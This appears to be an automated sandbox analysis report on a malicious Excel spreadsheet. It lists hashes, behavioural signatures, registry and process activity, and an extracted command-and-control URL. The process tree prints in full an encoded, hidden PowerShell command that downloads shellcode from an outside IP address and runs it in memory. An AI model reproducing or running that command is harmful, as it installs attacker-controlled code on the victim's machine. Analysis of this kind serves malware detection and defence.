Analysis
-
max time kernel
14s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 22:02
Behavioral task
behavioral1
Sample
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls
Resource
win10v2004-20241007-en
General
-
Target
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls
-
Size
46KB
-
MD5
a3d7a510ea532c4891ea21a29e0c66bb
-
SHA1
c5dbf470aec1f29ed239cc7aa1c471ab343909ca
-
SHA256
1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594
-
SHA512
52383dc88ad45dd62c8b77d38fafe78e1f7377efc939632106b1c043505572ecc78fd5b06f8172ce68dbd09961c05342329b71016aa703fb2b8d5b428cd1e5f9
-
SSDEEP
768:v4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:wSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2900 2732 powershell.exe 29 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 4 2900 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EXCEL.EXEpowershell.execsc.execvtres.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 2732 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2900 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2900 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid Process 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EXCEL.EXEpowershell.execsc.exedescription pid Process procid_target PID 2732 wrote to memory of 2900 2732 EXCEL.EXE 30 PID 2732 wrote to memory of 2900 2732 EXCEL.EXE 30 PID 2732 wrote to memory of 2900 2732 EXCEL.EXE 30 PID 2732 wrote to memory of 2900 2732 EXCEL.EXE 30 PID 2900 wrote to memory of 2672 2900 powershell.exe 32 PID 2900 wrote to memory of 2672 2900 powershell.exe 32 PID 2900 wrote to memory of 2672 2900 powershell.exe 32 PID 2900 wrote to memory of 2672 2900 powershell.exe 32 PID 2672 wrote to memory of 2696 2672 csc.exe 33 PID 2672 wrote to memory of 2696 2672 csc.exe 33 PID 2672 wrote to memory of 2696 2672 csc.exe 33 PID 2672 wrote to memory of 2696 2672 csc.exe 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1b492296522768350c056d852e9a728bdcd8e13a3158e2a4153a3015395c2594.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\peysklzo.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84DA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84BA.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2696
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD588e65e52f16793cea86e11e9abbbb5d4
SHA1c8b4fcdead50b67d453058f89ee1fb11777a5712
SHA25643874cadd0aaf794b6c1d07558cfa166fb7b7aca8d686be915002f51b9ba75d6
SHA5122a94cf06c4861cbb04a5685e510bce2e5f071013f4f24d44b648c17d63fe18f99fa89c829f10f83243ac6644afeae9bb8c867dca669b267d0d54320166e756b6
-
Filesize
3KB
MD5512d8fa14737a031d45071e12a670076
SHA1affcf40f7755a367cce6aa3837cf6f504e7cb3eb
SHA256700657e8d2a82be9e320870c1c81252103386324a301dfc96cb2ed3028fdced2
SHA512f2d2327293f3a90fc4782ba3d47f4d7ad7d6b3cfea89a2b7bd357b3b28b2cf43ff614b45b876f09d401a03e39656085ab6a2f1ad92e532e0448e80021069b124
-
Filesize
7KB
MD51d8492208bff04a139b9bca0603582bd
SHA1a49cda2d6257ffc3424ae5f062195e4d9368b48e
SHA256ffd3ed4ef04bc1fb2b361f99f7978699a3ebde9c64a1b3372371a01ddaaa51bb
SHA512c2a108793854e777c22d748ed2e7a69c1c424abd23cddf2760fa503f6bc57f2fcaca191bcf5868d9b109d1f54ab45772a885c20d32c81bc9b29988be51e99e07
-
Filesize
652B
MD52fcd31d17158856bbd5143594033923a
SHA1c29d1cf2a3fc8d215752bc874a92d72fa3779b6e
SHA2568615143acf60d532e72e8e2553c7c36adf2d99c68c6686f48de5e9d07c33a29c
SHA512302a30a6b8323ef2781a59a5d360524eef2630f739e7d3c51677683e8866d1c7e4bd40de35f1a54de0cc1725e31fbb16601c9ee478a2e422d1657dbb30cce34d
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
309B
MD5f025db255b740f02378ff01befffb234
SHA1216d4ed0281d4a05b90ccd9b7bb0298889732c85
SHA2569e6d1563b4e94f695a63cb31aa9095197b6d3f56fcc708d4af932d639afcf559
SHA51286bc447aefac33519b26b84c3d199d0aa23aa33b6e0a0646f279845e78e3018e55ee19f65d88956e9a7742e04bdd65f61c93479751e6387f4d746075a59235cc